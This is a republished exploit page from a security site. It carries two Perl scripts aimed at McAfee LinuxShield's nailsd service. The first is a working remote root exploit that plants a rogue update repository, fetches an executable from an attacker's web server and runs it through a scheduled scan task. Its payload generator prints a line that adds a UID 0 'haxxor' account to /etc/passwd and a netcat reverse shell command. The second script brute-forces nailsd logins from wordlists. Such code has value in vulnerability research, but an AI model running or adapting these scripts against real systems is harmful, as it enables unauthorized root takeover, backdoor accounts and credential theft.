首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
McAfee LinuxShield versions 1.5.1 and below remote code execution proof of conce
来源:http://sotiriu.de/ 作者:Sotiriu 发布时间:2010-03-04  

------------------nailsRoot.pl-------------------------

#!/usr/bin/perl

##
#  Title:     McAfee LinuxShield <= 1.5.1 Local/Remote Root Exploit
#  Name:      nailsRoot.pl
#  Author:    Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
#  WARNING:   This Exploit deletes the default Update Server
#
#  Use it only for education or ethical pentesting! The author accepts
#  no liability for damage caused by this tool.

##

use strict;
use IO::Socket::SSL;
use Getopt::Std;

my %args;
my $ack;
my $timestamp;

getopt('h:p:u:v:e:a:g:', \%args);

my $gen_exec    = $args{g};

if (defined $gen_exec) {
 genEx($gen_exec);
}

my $target_host = $args{h} || usage();
my $target_port = $args{p} || 65443;
my $nails_user  = $args{u} || usage();
my $nails_pass  = $args{v} || "";
my $exec_path   = $args{e} || "/opt/McAfee/cma/scratch/update/catalog.z";
my $my_host     = $args{a} || "";

my $range = 50000000;
my $minimum = 90000000;

my $randomtask = int(rand($range)) + $minimum;

my $pre="sconf ODS_99 ";
my $post="\x0d\x0a";

my $setrepo1='db set 1 _table=repository status=1 siteList=<?xml\ version="1.0"\ encoding="UTF-8"?><ns:SiteLis'.
             'ts\ xmlns:ns="naSiteList"\ GlobalVersion="20030131003110"\ LocalVersion="20091209161903"\ Type="Clie'.
             'nt"><SiteList\ Default="1"\ Name="SomeGUID"><HttpSite\ Type="repository"\ Name="EvilRepo"\ Order="1"'.
             '\ Server="';

my $setrepo2=':80"\ Enabled="1"\ Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAut'.
             'h><UserName></UserName><Password\ Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update';

my $setsite="task setsitelist";

my $begin="begin";

my$set="set ";
my $profile=" nailsd.profile.ODS_99.allFiles=true nailsd.profile.ODS_99.childInitTmo=60".
       " nailsd.profile.ODS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=10000 nailsd.profile.ODS".
       "_5.datPath=/opt/NAI/LinuxShield/engine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.profile.".
       "ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib nailsd.prof".
       "ile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so".
       " nailsd.profile.ODS_99.factoryInitT".
       "mo=60 nailsd.profile.ODS_99.heuristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=true nailsd.p".
       "rofile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false nails".
       "d.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1 nailsd.profile.ODS_99.quaran".
       "tineDirectory=/quarantine nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scan".
       "Children=2 nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profil".
       "e.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true nailsd.profile.ODS_99.scannerPath=".
       "$exec_path".
       " nailsd.profile.ODS_99.scansPerChild=10000 nailsd.profile.ODS_99.sl".
       "owScanChildren=0 nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.pat".
       "h=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all ".
       "nailsd.profile.ODS_99.filter.extensions.type=extension nailsd.profile.ODS_99.action.Default.primary=".
       "Clean nailsd.profile.ODS_99.action.Default.secondary=Quarantine nailsd.profile.ODS_99.action.App.pri".
       "mary=Clean nailsd.profile.ODS_99.action.App.secondary=Quarantine nailsd.profile.ODS_99.action.timeou".
       "t=Pass nailsd.profile.ODS_99.action.error=Block";

my $commit="commit ";

my $setdb=" _table=schedule taskName=$randomtask taskType=On-Demand taskInfo=profileName=ODS_99,".
        "paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 i_lastRun=1260318482 status=Stopped _cmd=insert";
 #update _where= i_taskId=2";

my $execupd="task nstart LinuxShield Update";
my $execute="task nstart $randomtask";

banner();

if ($exec_path eq "/opt/McAfee/cma/scratch/update/catalog.z") {
 if ($my_host eq "") {
  usage();
 }
 stOne();
}else{
 stTwo();
}

sub stOne {
 my $reposock = IO::Socket::SSL->new(
                        PeerAddr => $target_host,
                        PeerPort => $target_port,
                        Proto    => 'tcp',
        );

 if (defined $reposock) {
  print "[*] Executing Stage One\n";
  print "-----------------------\n";  

                $ack=<$reposock>;
                print $ack;

                print $reposock "auth ".$nails_user." ".$nails_pass.$post;
                $ack=<$reposock>;
                if ($ack=~m/ERR authentication failure/){
                        print "[-] Authentication failed...\n";
                        exit(1);
                }
                print $ack;
                sleep(1);

                print "[+] Repo update: inject evil repo\n";
                print $reposock $setrepo1.$my_host.$setrepo2.$post;
                sleep(1);

                print "[+] Repo Site update: update site task\n";
                print $reposock $setsite.$post;
                $ack=<$reposock>;
                print $ack;
                sleep(1);

                print "[+] Execute AV Update: downloading evil code\n";
                print $reposock $execupd.$post;
                sleep(5);  # Update needs a bit time
  $reposock->shutdown(1);
  
 }
 stTwo();
}

sub stTwo {
        my $sock = IO::Socket::SSL->new(
                        PeerAddr => $target_host,
                        PeerPort => $target_port,
                        Proto    => 'tcp',
        );

 if (defined $sock) {
                print "\n\n[*] Executing Stage TWO\n";
                print "-----------------------\n";

  $ack=<$sock>;
  print $ack;
  
  print $sock "auth ".$nails_user." ".$nails_pass.$post;
  $ack=<$sock>;
  if ($ack=~m/ERR authentication failure/){
   print "[-] Authentication failed...\n";
   exit(1);
  }
  print $ack;
  sleep(1);

  print $sock $pre.$begin.$post;
  $ack=<$sock>;
  print $ack;
   $ack=~s/\+OK //g;
   $timestamp=$ack;
   $timestamp=~ s/\s+$//;
   print "[+] Timestamp: $timestamp\n";
  print "[+] Profile: Injecting evil Profile\n";
  print $sock $pre.$set.$timestamp.$profile.$post;
  sleep(1);

  print "[+] Commit: Profile changes\n";
  print $sock $pre.$commit.$timestamp.$post;
  sleep(1);

  print "[+] Schedule: Injecting evil task $randomtask\n";
  print $sock "db set ".$timestamp.$setdb.$post;
  sleep(1);

  print "[+] Excute: Task $randomtask\n";
  print $sock $execute.$post;
  $sock->shutdown(1);
  print "[+] Done... Check whatever you did\n";
 } else {
           print "[-] some troubles with connection: $!\n" ;
 }
}

sub usage {

    print "\n";
    print " nailsRoot.pl - McAfee LinuxShield local/remote Root Exploit\n";
    print "===============================================================\n\n";
    print "  Usage:\n";
    print "           $0 -h <target ip> -u <user> -v <pass> [-a <my host>|-e <executable>]\n";
    print "  Optional:\n";
    print "           -a       <attacker host with httpd>\n";
    print "           -e       <executable file on target host>\n";
    print "           -p       <target port (default: 65443)>\n";
    print "           -g (1|2) <generat shell scripts to execute>\n";
    print "                    1 <UID 0 user add>\n";
    print "                    2 <reverse nc shell>\n";
    print "  Notes:\n";
    print "           -We can not handle arguments given to executable\n";
    print "            in the -e option.\n";
    print "           -To download your own evil executable, start a httpd\n";
    print "            and set the -a option. Create the directory <nai> in\n";
    print "            your wwwroot and rename your executable to <catalog.z>\n";
    print "  Author:\n";
    print "           Nikolas Sotiriu (lofi)\n";
    print "           url: www.sotiriu.de\n";
    print "           mail: lofi[at]sotiriu.de\n";
    print "\n";


    exit(1);
}

sub genEx {
    my ($code)=@_;
   
    if ($code==1) {
        print STDERR << "EOF";

============== UID 0 user add ==============

Copy this lines to the catalog.z file.

USER=haxxor PASS=haxxorPass

-------------- cut --------------
#!/bin/sh
echo haxxor:AzFQk89Xgpp8s:0:0::/:/bin/sh >> /etc/passwd
-------------- /cut --------------

EOF
   
    } elsif ($code==2) {
        print STDERR << "EOF";

============== reverse nc shell ==============

Copy this lines to the catalog.z file.

-------------- cut --------------
#!/bin/sh
nc -nv <yourip> 4444 -e /bin/sh
-------------- /cut --------------

EOF

    }

 exit(1);

}

sub banner {
 print STDERR << "EOF";
--------------------------------------------------------------------------------
         nailsRoot.pl - McAfee LinuxShield local/remote Root Exploit
--------------------------------------------------------------------------------
                                                                               
                                   111 1111111                                 
                            11100 101 00110111001111                           
                        11101 11 10 111 101 1001111111                         
                    1101  11 00 10 11  11 111 1111111101                       
                 10111 1 10 11 10  0 10  1 1 1  1111111011                     
              1111  1 1 10  0  01 01 01 1 1 111     1111011101                 
            1000   0 11 10 10  0 10 11 111 11111 11 1111 111100                
          1111111111 01 10 10 11 01 0  11 11111111111 1 1111  11               
         10111110 0  01 00 11 1110 11 10 11111111111 11 11111  11   111        
        101111111 0 10  01 11 1 11 0 10 11 1111111111111111 1111110000111      
        011111 0110 10 10  0 11 1 11 01 01 111111111111111 1 11110011001       
       1011111 0110 10 11 1110 11 1 10 11111111111111111111  1 100  001        
       1011111 0 10 10 01 1  0 1 11 1 111111111111111111111111 001101          
        011111 0  0  0 11 0 1111 0 11 01111111111111111111111111  01           
       1111111 01 01 111  1 1111 1 11 1111111111111111111111 1101 1111         
      111 1111 10  0 111110 0111 0 1  0111111111111111111111 11111 1111        
     111 11111  1  11 1 1 1    111 11 11111111111111111111111110    1001       
    111 1011111   1 11111111110111111111111111111111111111111 01 10111001      
   11 1100    10110110    10001        11101111111111111111  10 111 11100      
  111  00      1011101      00101       0  11111111111111111001 11  111101     
  11  00        00 101      1000011     1011   1111   1111111000 1111111 0     
  11 00          0   1011      100001    101000 1 1001         00001111  01    
  01101          11111 1011               01100    0101          110  11 10    
  10111                   1                0  01    0000011         10    10   
   10011                                    11100       1111         101   11  
      1110 01                                 101011                   1001100 
         1111000011                            1  111                          
                11000001111                                                    
                           1                                                   

EOF
}

---------------------------bruteNails.pl--------------------------

#!/usr/bin/perl

##
#  Title:     Brute force for McAfee LinuxShield nailsd
#  Name:      bruteNails.pl
#  Author:    Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
#  WARNING:   This Exploit deletes the default Update Server
#
# Use it only for education or ethical pentesting! The author accepts
# no liability for damage caused by this tool.
##

use IO::Socket::SSL;
use strict;
use Getopt::Long;
Getopt::Long::config qw(no_ignore_case);

$|=1;

my $total = 0;
my ($list,$host,$user,$passwd,$debug,$tout,$ufile,$pfile,$ip,$port);
my $stime = time();

my $opts = GetOptions( 'host:s' => \$host, 'user:s' => \$user,
                       'passwd:s' => \$passwd, 'debug:i' => \$debug,
                       'tout:i' => \$tout, 'Ufile:s' => \$ufile,
                       'Pfile:s' => \$pfile);

my $ip = $host;

# Default options
my $port = "65443" if ! $port;
my $tout = "10" if ! $tout;
my $post = "\x0d\x0a";

&help unless $opts;
if (!$host) { &help }
if (!$user && !$ufile) { &help }
if (!$passwd && !$pfile) { &help }
if ($ufile && $user)  { &help }
if ($pfile && $passwd) { &help }
#if ($ufile || $user) { &help }
#if (($pfile || $passwd) && $list ) { &help }

banner();

print "#" x 80;
print "\nTrying: $ip:$port ($tout secs)\n";
print "Running ....\n";

if ($ufile) {
 open U, "$ufile" or die "Can't open user file $ufile : $!";
 while (<U>) {
  chomp($_);
  $user = $_;

  if ($pfile) {
   open P, "$pfile" or die "Can't open passwd file: $pfile : $!";
   while (<P>) {
    chomp($_);
    $passwd = $_;
    my $ec = &connect($ip,$port,$user,$passwd);
    if ($ec == 0) {
     print "[+] GOT ONE: $user/$passwd - $ip:$port\n";
     $total++;
    } else {
     print "[-] FAILED: $user/$passwd - $ip:$port\n" if $debug;
    }
   }
   close (P);
  } else {
   my $ec = &connect($ip,$port,$user,$passwd);
   if ($ec == 0) {
    print "[+] GOT ONE: $user/$passwd - $ip:$port\n";
    $total++;
   } else {
    print "[-] FAILED: $user/$passwd - $ip:$port\n" if $debug;
   }
  }
 }
 close (U);
} else {

if ($pfile) {
 open P, "$pfile" or die "Can't open passwd file: $pfile : $!";
 while (<P>) {
  chomp($_);
  $passwd = $_;
  my $ec = &connect($ip,$port,$user,$passwd);
  if ($ec == 0) {
   print "[+] GOT ONE: $user/$passwd - $ip:$port\n";
   $total++;
  } else {
   print "[-] FAILED: $user/$passwd - $ip:$port\n" if $debug;
  }
 }
 close (P);
} else {
 my $ec = &connect($ip,$port,$user,$passwd);
 if ($ec == 0) {
  print "[+] GOT ONE: $user/$passwd - $ip:$port\n";
  $total++;
 } else {
  print "[-] FAILED: $user/$passwd - $ip:$port\n";
 }
}
}

my $ftime = time();
my $time = $ftime - $stime;
print "Finished: ($total) users found. ($time secs)\n";

sub connect {
my $ec = 1;
my ($ip,$port,$user,$passwd)=@_;
my ($socket) = IO::Socket::SSL->new(
               PeerAddr => $ip,
               PeerPort => $port,
               Proto => 'tcp') || die "Can't connect to: $ip:$port - $!\n";

$socket->autoflush(1);

 my $ack=<$socket>;
 print $ack if $debug;

 print $socket "auth ".$user." ".$passwd.$post;

 my $ack=<$socket>;
 print $ack if $debug;
 if ($ack=~m/successful authentication/){
 $ec=0;
 }
 close($socket);
 return $ec;
}

sub help {
  print "bruteNails - McAfee nailsd bruteforcer by <nsotiriu\@sotiriu.de>\n";
  print "usage: $0 -h <host> <[-u <user> | -U <file>] [-p <passwd> | -P <file>] [-t <n>] [-d <1|0>]\n";
  print "options:\n";
  print "  -h, --host <host>\t\thost \n";
  print "  -u, --user <user>\t\tusername\n";
  print "  -U, --Ufile <file>\t\tfile with users list\n";
  print "  -p, --passwd <passwd>\t\tpassword\n";
  print "  -P, --Pfile <file>\t\tfile with passwords list\n";
  print "  -t, --tout <n>\t\tconnection timeout (default: 10)\n";
  print "  -d, --debug <1|0>\t\tenable debug (default: 0)\n";
  exit 0
}

sub banner {
        print STDERR << "EOF";
--------------------------------------------------------------------------------
         bruteNails - McAfee nailsd bruteforcer by <nsotiriu\@sotiriu.de>
--------------------------------------------------------------------------------

                                   111 1111111
                            11100 101 00110111001111
                        11101 11 10 111 101 1001111111
                    1101  11 00 10 11  11 111 1111111101
                 10111 1 10 11 10  0 10  1 1 1  1111111011
              1111  1 1 10  0  01 01 01 1 1 111     1111011101
            1000   0 11 10 10  0 10 11 111 11111 11 1111 111100
          1111111111 01 10 10 11 01 0  11 11111111111 1 1111  11
         10111110 0  01 00 11 1110 11 10 11111111111 11 11111  11   111
        101111111 0 10  01 11 1 11 0 10 11 1111111111111111 1111110000111
        011111 0110 10 10  0 11 1 11 01 01 111111111111111 1 11110011001
       1011111 0110 10 11 1110 11 1 10 11111111111111111111  1 100  001
       1011111 0 10 10 01 1  0 1 11 1 111111111111111111111111 001101
        011111 0  0  0 11 0 1111 0 11 01111111111111111111111111  01
       1111111 01 01 111  1 1111 1 11 1111111111111111111111 1101 1111
      111 1111 10  0 111110 0111 0 1  0111111111111111111111 11111 1111
     111 11111  1  11 1 1 1    111 11 11111111111111111111111110    1001
    111 1011111   1 11111111110111111111111111111111111111111 01 10111001
   11 1100    10110110    10001        11101111111111111111  10 111 11100
  111  00      1011101      00101       0  11111111111111111001 11  111101
  11  00        00 101      1000011     1011   1111   1111111000 1111111 0
  11 00          0   1011      100001    101000 1 1001         00001111  01
  01101          11111 1011               01100    0101          110  11 10
  10111                   1                0  01    0000011         10    10
   10011                                    11100       1111         101   11
      1110 01                                 101011                   1001100
         1111000011                            1  111
                11000001111
                           1

EOF
}

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft OWC Spreadsheet HTML
·MiNBank 1.5.0 Remote Command E
·WebEx UCF atucfobj.dll ActiveX
·Opera <= 10.50 integer overflo
·Linux x86 - disabled modsecuri
·AKoff MIDI Player v1.00 Buffer
·ProSSHD v1.2 20090726 Buffer O
·WinSmMuPl 1.2.5 (.mp3) Local C
·Mozilla Firefox v3.6 and Opera
·Sagem Routers Remote Reset Exp
·Internet Explorer 'winhlp32.ex
·Sagem Routers Remote Auth bypa
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved